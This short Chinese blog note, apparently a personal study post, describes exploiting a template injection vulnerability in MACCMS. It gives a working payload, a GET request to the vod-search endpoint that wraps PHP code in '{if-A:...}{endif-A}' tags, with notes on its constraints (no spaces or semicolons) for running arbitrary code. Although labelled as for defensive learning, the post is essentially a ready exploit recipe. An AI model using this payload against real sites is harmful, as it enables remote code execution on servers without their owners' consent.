【笔记】MACCMS模板注入漏洞利用 发表于 2024-04-27 更新于 2024-05-13 阅读次数: 前言MACCMS模板注入漏洞利用 本文仅用于网络信息防御学习 payload phpinfo():PHP代码,不能包含空格,不能包含分号A:可以是任意字符,只要保证前后相同即可 request12GET /index.php?m=vod-search&wd={if-A:phpinfo()}{endif-A}Host: example.com 完成参考文献哔哩哔哩——逆风微笑的代码狗